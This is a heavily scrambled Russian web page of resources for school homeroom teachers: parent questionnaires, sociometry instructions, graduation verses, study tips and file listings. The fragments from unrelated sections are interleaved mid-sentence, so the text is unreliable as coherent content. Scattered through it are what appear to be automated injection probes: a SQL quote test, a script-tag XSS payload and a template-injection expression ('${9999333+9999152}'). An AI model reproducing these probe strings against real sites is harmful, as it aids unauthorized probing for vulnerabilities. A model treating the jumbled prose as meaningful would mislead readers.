​на него учителю.​ученика. Если же выбор ​

​учение многочисленным последователям, часть которых образовала ​учебного года; по результатам участия ​

​1'"​9. Вас обидел одноклассник, а вы пожаловались ​

​в сторону предпочитаемого ​поселился в Кротоне, в Южной Италии, где проповедовал свое ​

​проводить в конце ​e​

​- и те, и другие.​

​соединяются сплошной линией, если выбор устойчив. Если он односторонен, то стрелка указывает ​Именем Яваначарья ("Ионийский учитель"). По возвращении он ​

​Итоговую диагностику уместно ​• #12​

​- в основном мальчики;​Треугольники или кружочки ​день известен под ​

​и учеников.​1'"()&%<acx><ScRiPt >Akbs</ScRiPt>​

​- в основном девочки;​значится в матрице.​

​и по сей ​с другом, а также родителей ​e​- никто;​

​число, соответствующее номеру, под которым школьник ​Египте. В Индии он ​

​у учащихся друг ​• #13​

​- несколько человек;​или кружочке ставится ​

​в Халдее и ​ситуаций, которые могут возникнуть ​

​e​- большая часть класса;​

​а девочки кружками. В каждом треугольнике ​Индии, астрономию и астрологию ​

​собеседованиям, в решении проблемных ​

​• #14​- весь класс;​

​обозначения условны: так, мальчики отмечены треугольниками,​науки у брахманов ​детьми, при подготовке к ​

​1'"​противоречивым.​

​На карте все ​доступ. Так, он изучал эзотерические ​



Пожелания классному руководителю в анкете для родителей

​между родителями и ​

​e​

​- мнение было бы ​одного выбора.​

​различных систем, к которым имел ​

​в конфликтной ситуации ​• #15​

Красивые мелодии, которые пригодятся при проведении мероприятий, составления презентаций

​- одобрил бы;​

​круг попадают учащиеся, не получившие ни ​

​свою философию из ​Оперативная диагностика необходима ​

​e​

​внимания;​

​числа, а в четвертый ​свет и собрал ​

​экскурсий.​

​• • #16​

​- не обратил бы ​числа выборов; в третьем - менее половины максимального ​

​варваров. По преданию, Пифагор объездил весь ​

​• организаций поездок и ​

​353.5 KB​- осудил бы;​

​или половину  максимального ​доктрины греков и ​

​• внеклассных мероприятий​

​Microsoft Word Document ​бы;​

​выборов, во втором - получившие более половины ​

​"великого посвященного" во все тайные ​

​консультаций​•  Проверь себя: тесты, игры, вопросы​

​- резко вас осудил ​(в центре) карты располагаются учащиеся, получившие наибольшее число ​

​чудотворца, совершенного мудреца и ​• тематических и индивидуальных ​

​•   Девиантное поведение, или вредные привычки​

​девочкой.​

​В первом круге ​качестве полубога и ​

​• родительских собраний​

​•  Молодежная субкультура ​с мальчиком или ​

​ее условными обозначениями.​

​легенд, представляющих Пифагора в ​подготовке:​

​3.0 MB​

​8. Вы стали дружить ​не все связи, чтобы не загромождать ​

​трудно отделить от ​

​классному руководителю при ​MP3 Audio File ​

​- и те, и другие.​

​Примечание: На данной карте ​Историю его жизни ​

​Предварительная диагностика необходима ​

​MP3 Audio File ​- в основном мальчики;​

​Radio_Killer_-_Be_free_(Radio_Edit)_muzn​

​489.1 KB​Чува-у-ва.wma​

    Если вы опасаетесь, что вызывает ваши опасения?

​MP3 Audio File ​

​Лядов Музыкальная табакерка​

​3.8 MB​

​MP3 Audio File ​MP3 Audio File ​

​33-Chopin. Valse No14.mp3​

​Шопен Мазурка​

​6.8 MB​

​Портфолио классного руководителя​

​Урок Повышение статуса ​

​Microsoft Word Document ​

​Microsoft Word Document ​

​189.0 KB​

​классного руководителя с ​

​по П​

​27.0 KB​

​23.0 KB​

​Воспитательная работв в ​

​"Методическое путешествие"​

​Microsoft Word Document ​

​коллектива и его ​

​Microsoft Word Document ​

​Методика проведения активных ​

​23.5 KB​

​Microsoft Word Document ​

​Анкетный опрос родителей ​

​${9999333+9999152}​

​9. Каким опытом Вы ​

​ребят больше всего ​

​6. Что Вам лучше ​

​родителями, учителями, общественными организациями;​

​– в выборе форм ​

​в организации своей ​

​бы от неё, если была бы ​

​АНКЕТА ДЛЯ классных ​

​11. Главное – сохраняй молодость души ​

​актов благодарности, тогда не будет ​

​с ними.​потрачены напрасно.​

​– она приносит хорошие ​

​обучению хотя бы ​

​быть вместе. При этом к ​

​должно быть меньше ​

​Кодекс классного руководителя​

​• Консультация должна быть ​

​в сравнении с ​

​проблемах.​

​необходимо обратить внимание ​в решаемой проблеме.​свое мнение и ​им самим с ​

​• Консультация проводится по ​

​была вера в ​



​их способности, не может научить ​быть творческой личностью, «исследователем», а не простым ​«трудными» подростками следует так ​детьми педагог не ​общении на особенности ​·        Не забывайте, что у детей ​

​отношениях с детьми, выстраивайте их.​Где раздают щенкам ​Не будет преданным ​С РОДИТЕЛЯМИ УЧАЩИХСЯ​РОДИТЕЛЕЙ​26.1 KB​11.3 KB​ОСНОВНЫЕ ЭТАПЫ РАБОТЫ ​ДЕЯТЕЛЬНОСТИ ПЕДАГОГОВ И ​И ИХ РОДИТЕЛЯМИ​Microsoft Word Document ​методы изучения семьи.docx​читающая семья.docx​несовершеннолетнего​

​ДНЕВНИК.rar​НАСТОЛЬНАЯ КНИГА КЛАССНОГО ​Темы по самообразованию.doc​147.0 KB​33.5 KB​года.doc​Microsoft Word Document ​Microsoft Word Document ​270.8 KB​при подготовке к ​Как научиться сдавать ​День коллективного отдыха ​

​Громких слов говорить, клятв высоких давать.​этой памятной встречи ​было настоящее счастье.​Пожелание​прощания настал,​<

​так работалось, как пелось,​И пусть все ​о прожитом напрасно?​

​путь, и пожелаем​вспять.​день весенний,​Огромного, святого недовольства​Не так легко, не так все ​Будь беспокойным! Не считай отрадой​Надежду – путь к спасенью, –​

​свежих ран​огней​

​Зависти и лжи.​

​не сожалеть.​круг друзей.​

​Тех, кто дорог, принимаю.​Но скоро он ​

​Грустной музыкой звонка​своем храните​

​Это время покажет.​ли в школу​И без меня ​

​они смогут​Остался всего лишь ​

​На классных часах ​ногою​

​в них вложили?​Рыбка​

​Ни дворцов, ни дворянства,​колени,​И голосом молвит ​

​закинули невод –​Раз закинули невод ​Чтобы когда-нибудь в школу​

​В вузы – и лучше бесплатно!​А я бы ​

​Рыбка!​Государыня Золотая!​О чем он ​

​Они Золотую рыбку.​

​Пошли они к ​И от забот ​

​классных папы.​У самого синего ​Садитесь, друзья, поудобней,​

​компьютер полюбит ребят...​работать ничто без ​Перфокарты, компьютер, дисплей, терминал,​

​И всех педагогов ​И каждый частицу ​

​Но надо прощать, и в этом ​Сегодня меж нами ​И нам было ​

​Ну что же, чудеса свершились.​могла,​Бог. ​

​Придется пряник свой ​Да только вот ​

​Граммульку эгоизма.​Немного меланхолии,​А также привлекательной.​И в мужиков ​

​А дальше - пусть следит за ​перед сном​

​поет,​ей семьей,​

​И ноги на ​Ангел. ​

​пусть все в ​

​Командовать тут буду ​Эй ты ангел, эй ты черт!​все будни - это просто сказка.​

​Это тот, кто в школьной ​смотрела.​

​Бог. ​Табличка на ширме ​А может, не последнего,​

​Сдадут наверняка. Теперь пора их ​Но сколь чего ​

​Как бы ни ​синевы!​Не спешите вы ​

​пути-дороги,​украшают, –​

​И почаще вспоминайте ​вы несчастий!​Дай к друг ​<

​к мечте.​И друзей хороших ​Не торопитесь уходить...​отмахнуться.​узнать​Чтоб отчужденья лед ​

​Не торопитесь разлюбить,​Когда вам душу ​двери.​Ну, а мы, все педагоги,​Приходить сюда почаще,​стрелял?​нам мальчишек,​Все сияет и ​

​их отправить​Аттестаты выдаем!​умнели​С каждым днем ​«Мы вам вот ​Поменьше недовольных, равнодушных!​благородный труд!​пускай пройдут!​Поклон Вам за ​Учили думать нас ​

​Умы Вы наши ​хвала!​Вы классные! Творите только добрые ​дорогу,​Ваш труд почетен, благороден,​шагать,​А птица счастья ​сердце не остынет,​своих,​

​в душе старайтесь ​Людей в беде ​А мы желаем ​дорог​открыта дверь.​

​Вам, дорогие учителя ( вручает хлеб учителям ​хоти поблагодарить тех, кто чуточку приблизил ​И в добрый ​верю как учитель.​<

​класс -​и мечтали​

​И здравый смысл ​

​мы смеем,​

​На светлый путь ​дети!​

​важные места​

​цепочку.​словом образуется цепочка.​

​помощью вопросов.​с соответствующим разделом ​слов запиши их ​

​абзаца. Вспоминая ключевые слова, мы сра­зу вспоминаем весь ​Метод ключевых слов​

​связать с другими ​—то, к чему нам ​

​  У тебя все ​тексте и способствует ​

​подготовке устных заданий ​последний день, поскольку это требует ​знаешь. Соотноси новое с ​

​в этом тексте, что об этом ​направлено.​12. Между уроками делай ​

3. Важным направлением в работе классного руководителя младших школьников является диагностика

​11. После того как ​понадобится для выполнения ​уроков, раскрой дневник, посмотри, все ли задания ​8.   В случае необходимости ​о том, что надо сделать ​

​помощью на­ходить нужную информацию, производить нужные расчеты ​и справочниками. Вы­ясняй значение незнакомых ​1. Активно работай на ​Microsoft Word Document ​32.5 KB​Microsoft Word Document ​Microsoft Word Document ​

​Microsoft Word Document ​3.1 MB​образу жизни​теме Что означают ​(ЮНИСЕФ) в Республике Беларусь​фильмов "Каждый имеет право ​лицах с особенностями ​Microsoft Word Document ​на этой стрнице.​

​Twilight-3.mp3​MP3 Audio File ​3.0 MB​

​krasivaya_fonovaya_muzyika_1.mp3​

​4.3 MB​MP3 Audio File ​

​61-Tchaikovsky. Overture to Nutcracker.m​

​35-Schubert. Ave Maria.mp3​Шопен Вальс № 14​

​6.8 MB​Microsoft Word Document ​Портфолио классного руководителя​взаимодействие с родителями​МО классныхруководителей.doc​КЛА​Microsoft Word Document ​учителя. Пути эффективного взаимодействия ​РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ ​

​Microsoft Word Document ​Microsoft Word Document ​41.0 KB​Деловая методическая игра ​тему Роль классн​в становлении классного ​Методика проведения актив. форм восп..do​26.0 KB​Microsoft Word Document ​Анкетный опрос родителей.doc​предложения.​Вас радуют?​7. Какие качества поведения, черты характера Ваших ​их причину?​– в работе с ​– в планировании;​3. Какую конкретную помощь ​

​или Вы отказались ​счастливая профессиональная карьера.​над собой.​9. Главное – не жди прямых ​с тобой, а тебе интересно ​

​учеников, никогда не будут ​и меньше ругать; исповедуй педагогику успеха ​своих способностей к ​тот отрезок времени, который вам выпало ​

​взаимоотношениях с воспитанниками ​лучшую сторону.​по проблеме специалистов, педагогов, классного руководителя.​о прежних качествах, успехах и недостатках ​

​потом говорить о ​• В ходе консультации ​родителям, должны быть компетентны ​

​заинтересованным сторонам высказать ​известна и рассматривалась ​(с родителями)​на Руси всегда ​детьми, не верящий в ​

​·        Помните, что преподаватель должен ​·        При работе с ​·        При общении с ​·        Обращайте внимание в ​<

​·        Умейте слушать детей.​·        Думайте о своих ​Попробуй, подзови щенка.​Щенок, воспитанный пинком,​ФОРМЫ ВЗАИМОДЕЙСТВИЯ УЧИТЕЛЯ ​И ЛЕКЦИЙ ДЛЯ ​Microsoft Word Document ​Microsoft Word Document ​12.3 KB​ОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ ​РАБОТЕ С УЧАЩИМИСЯ ​обучение родителей.docx​

​УЧЕНИКА​Читающая семья​жизни и воспитания ​Дневник классного руководителя​РУКОВОДИТЕЛЯ​классных руководителей.​Microsoft Word Document ​Microsoft Word Document ​Классное руководство Ученик ​

​Клруководство День науки.doc​экзамены.docx​compressed file archive ​Памятка для учащихся ​35.0 KB​никогда не терять. ​давать обещаний трескучих,​Хоть немного тепла ​Чтоб у каждого ​прозвучал.​

​И вот момент ​Чтоб в жизни ​Необходимо жизни пожелать.​Но что грустить ​Так в добрый ​Их школьный день, не повернуть все ​зале в этот ​живой​сначала начинай!​Дорогой выпускник!​не отдам​Сколько в сердце ​И блеском призрачных ​

​лжи,​Ни о чем ​Как мне нужен ​круг друзей​пока –​

​и ансамбль)​

​И в сердце ​не скажет,​А вот придут ​Медали свои золотые.​И без меня ​Родителей доставали?​

​ваши​Разве не вашей ​Сколько вы сил ​Послушала всех их ​ни нового корыта,​Классные мамы на ​Попалась Рыбка Золотая​В другой раз ​в синее море​Может, хочу слишком много, –​поступят​сдали!​взмолился:​

​Рыбка!​думу:​

​то, что поймают​И днем, и позднею ночью.​

​общие.​

​И два еще ​

​О Золотой рыбке.​

​(Сказка классных руководителей)​

​И навряд ли ​И не будет ​

​Теле-, видеобум, информационная масса,​говорим мы "спасибо" особо,​

​дорог,​

​Заносчивость, лень и безграмотность, жуткий ответ,​

​быстро порою,​

​мамой второю,​

​него душа.​

​Чтоб поделиться им ​к нему кнут.​

​Ну как детьми-то управлять?​Бог. ​это​Ангел. ​

​Бог. ​Черт. ​создадим.​

​И про вампиров ​Пусть деткам песенки ​

​Пусть будет школа ​Черт. ​( под музыку лепят)​Лепите, поспешайте!​

​работа.​маму классную слепить!​

​Рядом с ним ​добрыми лучистыми глазами.​и за детьми ​Перед ширмой сидит ​

​Сценка "Божественная комедия".​Настал черед последнего,​И верим, что экзамены​

​Прилетайте, чайки и орлы!​не забывайте,​Неба не пугайтесь ​

​порога​Вам открыты все ​Вашу жизнь пусть ​и успех!​

​Чтоб не знали ​сильнее быть.​Привела бы вас ​и любви.  ​вернуться...​От вздорной мысли ​А вдруг получится ​не хватить,​

Методика незаконченных предложений для родителей первоклассников

​Вы ведь умеете, я знаю!​Не торопитесь отвергать,​

​Постойте у открытой ​Каждый класс, как дом родной...​этот час​

​Кто из трубочек ​Как не вспомнить ​учеба?​

​Как бы строем ​нашим деткам​

​На глазах они ​

​Жил одиннадцатый класс.​

​Выступление учителей​

​послушных,​

​Оплачен хорошо Ваш ​Невзгоды мимо Вас ​

​это.​ответы.​советы!​

​Вам и огромная ​поздравить,​детям в Жизнь ​

​Уважаемые классные руководители!​Смелее по земле ​станет.​

​Любовь пусть в ​Не предавать друзей ​Мама С добром ​Уметь любить, страдать, мечтать,​будет строг,​Из множества земных ​В большую жизнь ​сердце. Огромное родительское спасибо ​Мама. Мы - счастливые родители, дорогие наши дети, и сегодня мы ​Желаю счастья всем, здоровья.​В тебя я ​Мой уходящий выпускной ​Чтоб вы творили ​мир станет добрее,​Надеяться на вас ​ждет?​Дорогие мои взрослые ​

​3П — Пометь карандашом самые ​Перескажи текст, опираясь на эту ​с последующим ключевым ​ключевых слова с ​слову поставь вопрос, который по­зволит понять, как оно связано ​После выбора ключевых ​способствовать воспроизведение соответствующего ​нашими переживаниями (и приятны­ми, и неприятными).​

​—то, что мы можем ​—то, чем постоянно пользуемся;​22. Проверяй себя.​самом важном в ​20. Попробуй использовать при ​к докладам, сочинениям, твор­ческим работам на ​узнаешь, с тем, что ты уже ​о ком говорится ​правила, на которые оно ​выполнения следующего, и т.п.​(учеб­ник, тетради, карты, карандаши, словари, справочники и т.п.). ​

​предметам и прикинь, сколько времени тебе ​9.  Приступая к выполнению ​приемов, средств) это мож­но сделать.​каждого задания, думай не только ​есть компьютер, научись с его ​4.   Научись пользоваться словарями ​




​Памятка для учащихся​
​ученика.doc​Microsoft Word Document ​

Вс



​сидеть правильно.doc​


​по ТБ.doc​
​поведения в конфликте.do​
​Microsoft Word Document ​

​Таблицы по здоровому ​Классный час по ​Детского фонда ООН ​на основе телвизионных ​общественного мнения о ​оканчанию учебн​Спасибо еще раз. Ваше имя появится ​

​2.7 MB​свеж.mp3​MP3 Audio File ​4.3 MB​MP3 Audio File ​60-Tchaikovsky. Valse Sentimentale.mp3​опере Щелкунчик​Шуберт Аве Мария​3.2 MB​MP3 Audio File ​Портфолио классного руководителя.doc​32.0 KB​руководителя и успешное ​руководителей​Клруководство ПРАВИЛА СОТРУДНИЧЕСТВА ​учителя. Пути эффекти​В копилку молодого ​ПРОФЕССИОНАЛЬНОЙ ОРИЕНТАЦИИ.​часа​школе НАПРАВЛЕНИ​Microsoft Word Document ​353.5 KB​Педагогический совет на ​тему: "Роль классного руководителя ​деятельности.​Microsoft Word Document ​Заповеди классного руководителя.doc​году​10. Ваши пожелания и ​ребят больше всего ​

​классом?​Вы сталкиваетесь, работая с классом? В чем видите ​коллектива;​получить:​классного руководителя?​работа классного руководителя ​должна состояться твоя ​

​– твое отражение; старайся постоянно работать ​с родителями: дети – родители – учитель – семья.​к тебе прислушиваться, им будет интересно ​насыщенной классной жизни, на культурное развитие ​4. Лучше больше хвалить ​3. Учащиеся, не нашедшие подтверждения ​ними совместной деятельностью ​1. Во взаимодействии и ​семье и в ​родителям реальные рекомендации ​друг с другом, можно лишь говорить ​

​ребенке и только ​угроз.​• Участники консультации, которые пытаются помочь ​необходимо дать возможность ​• Проблема, которая будет обсуждаться, классному руководителю хорошо ​КОНСУЛЬТАЦИЙ​Помните, что основой нравственности ​своих отношений с ​

«Числа правят миром через свойства геометрических фигур».

​«ситуацию успеха».​(объективной оценки себя, самоконтроль).​к некоторым ребятам.​

​своей педагогической несостоятельностью.​к человеку, как высшей ценности.​С. Михалков​

​пинка​14.0 KB​13.3 KB​ПРИМЕРНАЯ ТЕМАТИКА БЕСЕД ​роль родителей.docx​ШКОЛЫ.docx​Microsoft Word Document ​15.0 KB​КЛАССНОГО РУКОВОДИТЕЛЯ В ​ОБУЧЕНИЕ РОДИТЕЛЕЙ​МЕТОДЫ ИЗУЧЕНИЯ СЕМЬИ ​39.0 KB​Акт обследования условий ​731.0 KB​НАСТОЛЬНАЯ КНИГА КЛАССНОГО ​


​Темы по самообразованию ​




АНКЕТА ДЛЯ РОДИТЕЛЕЙ

​Новые формы воспитания.doc​
​ФУНКЦИИ КЛАССНОГО ЧАСА.doc​
​конкурс​
​Первооткрыватели​шутку, и в серьез)​
​Экзамены.rar​
​64.5 KB​
​Microsoft Word Document ​Чтобы школьный престиж ​И не будем ​

​Отзвенела гитара, и балу - отбой!​

​Поменьше ненастья,​
​Чтобы звонок последний ​стал виднее,​школе сдать,​И юношам, и девушкам прекрасной​ни пера.​

​Промчалась школьная пора.​Для них настал, действительно, последний​
​ Как грустно в ​тебе горит огонь ​
​И снова все ​Припев.​
​Но никому я ​Время, словно карусель.​может,​
​Против зависти и ​Что задумано, успеть,​
​Все больше понимаю,​В свой сердечный ​Он не закончился ​(Исполняют классные руководители ​
​Терпения наберитесь​Сейчас вам никто ​вы их учили.​получат​
​никак неймется?!​ваши​
​Разве уста не ​Каждый дневник исписан?​их учили?​
​Наши заветные желания!»​Не надо нам ​
​Бухнулись перед нею​
​В третий раз, наконец-то,​одною тиной.​
​И вот они ​Смилуйся, государыня!​
​Пусть наши дети ​Чтобы ЕГЭ все ​А я бы ​
​Я сказала бы:​И каждый думает ​
​В надежде на ​болела​
​А вот заботы ​мамы​Старую, мудрую сказку​
​РЫБКЕ​подскажет, никто не обучит,​один перед классом.​
​Спецэффектная жизнь жизнь, технологий обвал,​Но классным своим ​
​И каждый учитель, конечно, нам стал уже ​нас было: взаимные ссоры, обиды,​Но время идет, и бежит очень ​
​Давно мы сроднились, вы стали нам ​Пусть вселится в ​
​,​А я добавлю ​


​Ангел. ​быстро все слепили,​

Скачать:

​И подбросим  в ​

​Добавим обязательно.​

​Пусть будет обаятельной.​

​Пусть спортом увлекается.​Гибкий стан ей ​

​Черт. ​Ангел.​Бог. ​классных руководителей)​Приступим, помогайте!​

​охота!​

​Вас уж ждет ​подсобить:​

​остатка.​

​Это мама с ​Чтобы классною была ​классные руководители, ангел и черт.​К Последнему звонку​Проходит и кончается,​

​случается.​

​Прилетайте в гости, прилетайте,​Гнезд своих родных ​

​сами,​

​Только тайну отчего ​Классные  руководители. ​Красота, добро, надежда, радость, вера и любовь​

​вечно были счастье ​

​освещает путеводная звезда!​

​быть мудрее и ​

​жизни​чуть побольше счастья ​Как нелегко назад ​

​забыть,​

​Найдите миг остановиться,​Тепла вам может ​

​Сумейте просто промолчать,​

​Тех, кто вас любит, кто вам верит.​Не торопитесь уходить!​

​Здесь вас любят.​Пожелать вам в ​

​В доску глядя, что есть мочи,​Глянешь – сердце защимит.​

​И какая тут ​В голове – одни мечты!​

​А теперь мы ​

​нас.​этой крышей​

​все Ваши труды!​Учеников пытливых и ​полон,​

​желаем вам здоровья,​Спасибо классные за ​На все были ​

​За строгость, и за дельные ​За это честь ​хотим мы вас ​Вы дали нашим ​

​вспоминать.​

​пожелать​И чуждою жестокость ​без них.​хранить, ​зло не отвечать.​лучшее познать.​

​Пусть этот выбор ​ним вперед идти.​

​сейчас, поверь,​

​знания, но и свое ​родителей​я,​Задорный, юный, озорной,​

​сопровождали.​хотелось,​Что с вами ​

​к вам придет.​В большую жизнь. А что вней ​классных руководителей​

​вопросы​выучить.​своим раз­делом текста и ​

​Соедини два соседних ​К каждому ключевому ​одно-два ключевых слова.​

​Ключевое слово должно ​—то, что связано с ​—то, что нам нужно;​

​запоминаем:​ответа.​

​сосредото­чить внимание на ​

​умеешь пользоваться картами, схемами, таблицами, тем выше будет ​18. Не оставляй подготовку ​нового понятия, явления, о котором ты ​вопросы: о чем или ​письменные задания, пойми и выучи ​при­готовь то, что нужно для ​

​выполнения первого задания ​

​заданий по отдельным ​

​к одноклассникам.​

​том, как (с помощью каких ​

​7.   Приступая к выполнению ​

​5.   Если у тебя ​

​или с чем-то не согласен.​

​задания​

​Отчёт о поведении ​

​О режиме дня.doc​

​На стенд Учись ​

​На стенд Памятки ​

​На стенд Кодекс ​

​образу жизни.doc​

​67.0 KB​Классный час (детям будет интересно)​на сайте Представительства ​родителями и учащимися ​целью формирования позитивного ​Классный час посвященный ​оценку. Если хотите, чтобы Ваше имя​

​MP3 Audio File ​File 2.6 MB​Выход Ведущего - Хорошо.mp3​

​MP3 Audio File ​шаре.mp3​Чайковский Сентиментальный вальс​Чайковский увертюра к ​4.4 MB​MP3 Audio File ​31-Chopin. Valse No10.mp3​о правах ребенка​

​Microsoft Word Document ​Повышение статуса классного ​

​Методическое объединение классных ​РУКОВОДИТЕЛЯ С УЧАЩИМИСЯ​В копилку молодого ​31.5 KB​

​СРЕДНИХ КЛАССОВ ПО ​Методика проведения Информационного ​Воспитательная работа в ​для кл. руково​Microsoft Word Document ​личности каждого ученика"​Педагогический совет на ​

​видов коллективной творческой ​Как составить справку.doc​Заповеди классного руководителя​собрании в учебном ​с коллегами?​

​8. Какие качества поведения, черты характера Ваших ​Вашей работе с ​5. С какими трудностями ​

​– в изучении ученического ​Вы хотели бы ​

​2. В чем, по Вашему мнению, заключается сложность работы ​

​1. Привлекает ли Вас ​будет понять юных, рядом с которыми ​10. Дети в классе ​8. Лучшая форма взаимоотношений ​можешь вовлечь детей, стать им интересным, тогда они будут ​5. Силы и время, потраченные на организацию ​школе вообще.​к тебе.​2. Главное – не воспитывать ребят, а жить с ​Советы, рекомендации, предостережения классному руководителю:​реальным изменениям в ​• Консультация должна дать ​неуместно сравнивать детей ​хорошее и положительное, что есть в ​в доброжелательной атмосфере, без назидания и ​проблеме.​• В ходе консультации ​руководителя.​РЕКОМЕНДАЦИИ К ПРОВЕДЕНИЮ ​умножения.​·        Чаще улыбайтесь детям. Школа, лишенная оптимизма, деградирует и умирает, преподаватель, не видящий перспективы ​гарантирован успех, как следствие, уважение сверстников, то есть обеспечить ​эмпатии (сочувствие,  сопереживание  ребенку)   и   педагогической   рефлексии ​·        Преодолевайте отрицательное отношение ​можете спровоцировать их ​

​в детском коллективе, прежде всего, зависит от отношения ​

​Там воспитатели – пеньки.​Ты после грубого ​Microsoft Word Document ​Microsoft Word Document ​20.3 KB​ОРГАНИЗАЦИИ ДОСУГА ПОДРОСТКА​ОСНОВНЫЕ ЭТАПЫ РАБОТЫ ​ОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ.docx​Microsoft Word Document ​ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ ​16.1 KB​31.2 KB​Microsoft Word Document ​71.0 KB​Microsoft Word Document ​36.5 KB​64.0 KB​РАБОТЫ​37.0 KB​Ученик года​День науки​экзаменам и в ​Буклет​Microsoft Word Document ​

​День коллективного отдыха.doc​земле постараемся лучше,​

​Унесите с собой, унесите с собой!!!​вновь опускается вечер,​широкой дороги, ​мгновения важнее,​Итог работы нашей ​

​Экзамены успешно в ​нами результат.​жизни вам и ​мы поздравляем,​нам опять.​

​Слова учителя​

​Но пусть в ​Дерзай! Работай! Ошибайся! Падай!​

​отдам!​сожалений!​тревожит​Закружить легко нас ​

​И терпенья одолжи​О боже, дай мне сил,​

​дней​Грустной музыкой звонка…​

​проплывает,​

​«Молитва»​с богом,​словом,​

​Не зря же ​И без меня ​Что ж вам ​Разве звонки не ​проложен?​рукою​

​«Сколько вы лет ​исполнить​«Государыня Рыбка!​

​«Чего вам надобно, люди?»​травою морскою.​Пришел он с ​добрым словом!​бы Рыбку:​Государыня Рыбка!​

​Сделай такое чудо,​Свои подтвердили медали!​

​Какое желанье исполнить?​синему морю,​Чтобы забросить невод​У них голова ​

​были разные –​Жили две классных ​сказку –​

​СКАЗКА О ЗОЛОТОЙ ​И никто не ​при всем ты ​

​о нас.​сердце у нас,​И мы понимаем: труднее профессии нет.​И все у ​бы на день.​нас получились.​

​всех хватило.​дам такое сердце ​

​Черт. ​Дать ей позабыли.​Ну, слава Богу, молодцы -​Черт. ​Немного чертовщинки​
​Ангел. ​
​Ангел.​
​Бог. ​играет.​
​работе.​
​ноги)​руки и головы ​
​войдет.​
​Мне чудо сотворить ​ангел и черт)​
​Что ж придется ​Это сердце, отданное детям без ​
​Справочная. ​
​Чтоб женщиной была, наукой чтоб владела,​
​За ширмой  сидят ​
​Последнего звонка!​
​И детская, и вольная,​
​А все конец ​
​жизни веселы,​
​Чайками, девчонки, будьте вы!​
​Звезды доставать учитесь ​и решить,​
​и вновь.​
​всех.​В семьях чтобы ​
​Светлый путь пусть ​
​Дай вам Боже ​Чтоб дорога вашей ​
​Дай вам Боже ​
​возвратить,​
​Не торопитесь все ​
​Не торопитесь успевать.​
​отвергая,​
​Достаньте мудрости печать,​
​легкостью забыть​
​Выступление классных руководителей.​
​Здесь вас помнят,​мы, ребята,​
​столько воевал!​
​Губки, щечки, глазки в краске.​красоты!​
​нам девчонок –​
​каждым днем,​Становился он у ​
​Целый год под ​
​Пусть высоко оценят ​
​творчества желаем!​
​Вас пусть будет ​
​Мы все родители ​
​Дарили мудрость детям, а родителям терпенье​
​Оценки, шалости –​
​уважаем,​
​Вы искренни, ответственны, надежны​
​Сегодня от души ​
​больших!​И добрым словом ​
​Еще хотим мы ​
​покинет,​в жизни нам ​
​Обиду долго не ​
​И злом на ​
​Все в жизни ​
​поспеши.​
​И вам по ​
​Папа Перед тобой ​
​не только свои ​
​Пожелания детям от ​Вас поздравляю нынче ​ценитель,​
​В делах всегда ​
​Хочу, чтоб вам дерзать ​
​мысль такую,​И пусть удача ​
​проважаем​
​Пожелания детям от ​2П — Придумай к нему ​
​и постарайся ее ​
​ключевого слова со ​
​понять эту взаимосвязь.​
​выполнения задания.​
​Читая абзац, выбери для него ​
​каждом абзаце.​
​умениями;​(прерванные дей­ствия);​
​Помни: мы лучше всего ​21. Составляй план устного ​
​США, такой метод позволяет ​
​заранее, на про­тяжении нескольких дней, распределяя нагрузку равномерно.​
​не случайные, вне­шние связи, а главные связи, связи по смыслу.​16. Ищи связь каждого ​
​учебника задавай себе ​
​14. Прежде чем выполнять ​уроку, все убери и ​
​все лишнее—то, что может отвлекать. При­готовь то, что нужно для ​
​10. Продумай последовательность выполнения ​
​ко взрослым или ​
​содержании задания), но и о ​
​таблиц и т.п.​
​и объяснения, правила, формулы в справочниках.​
​2.   Задавай вопросы, если чего-то не понял ​
​Как готовить домашние ​ученика​
​О режиме дня​
​Учись сидеть правильно​
​Памятки по ТБ​конфликте​
​Таблицы по здоровому ​
​Microsoft Word Document ​имена​
​21 фильма размещен ​
​организовать работу с ​
​Классные руководители 1-11 классов с ​
​окончанию учебного года​
​Спасибо за Вашу ​
​5.7 MB​
​На стихи.mp3​
​Windows Media Music ​3.4 MB​76-Liadov. Musical Snuff-Box.mp3​
​04. ДиДюЛя - Полет на воздушном ​5.9 MB​
​7.9 MB​
​MP3 Audio File ​32-Chopin. Mazurka in C-sharp minor.mp3​
​Шопен Вальс №10​
​Извлечение из конвенции ​классного руковод​
​26.5 KB​
​29.5 KB​
​ПРАВИЛА СОТРУДНИЧЕСТВА КЛАССНОГО ​
​родителями​
​Microsoft Word Document ​
​РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ ​
​Информационный час​
​школе. Направления работы​Деловая методическая игра ​
​54.5 KB​влияние на формирование ​
​32.0 KB​
​форм воспитания и ​Школьный документ - справка.​
​22.5 KB​
​на первом родительском ​могли бы поделиться ​
​Вас огорчают?​
​всего удается в ​
​– в другом (укажите, в чем именно)_____________________.​
​и методов;​
​работы с классом ​
​такая возможность?​
​РУКОВОДИТЕЛЕЙ​
​на долгие годы, тогда тебе легче ​разочарований.​7. Родитель ребенка – не твой ученик, не твой враг, а друг, советчик, единомышленник.​6. Главное – найти какое-либо интересное дело, в которое ты ​
​результаты.​по одному предмету, теряют интерес к ​
​воспитанникам относись так, как хочешь, чтобы они относились ​
​формализма, больше человеческого общения.​Классный руководитель – это не работа, это образ жизни.​
​перспективной и способствовать ​
​сегодняшним днем.​• В ходе консультации ​
​на все то ​
​• Консультация должна проходить ​
​свое отношение к ​
​различных позиций: ребенка, родителей, педагогов.​
​запросам родителей, ребенка и классного ​
​Бога и труд.​
​их даже таблице ​
​«урокодателем», обезличенным носителем информации».​организовывать деятельность, при которой «трудному» ребенку был бы ​должен забывать об ​девочек. Они более эмоциональны, ранимы.​могут быть конфликты, и что вы ​
​·        Помните, что психологическая атмосфера ​пинки,​
​щенком.​
​формы взаимодействия.docx​тематика бесед.docx​
​Microsoft Word Document ​
​РОЛЬ РОДИТЕЛЕЙ В ​ШКОЛЫ С РОДИТЕЛЯМИ​
​РОДИТЕЛЕЙ​
​ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ.docx​
​28.1 KB​
​Microsoft Word Document ​
​Microsoft Word Document ​
​Акт обследования класс.doc​
​compressed file archive ​

​РУКОВОДИТЕЛЯ.​Microsoft Word Document ​

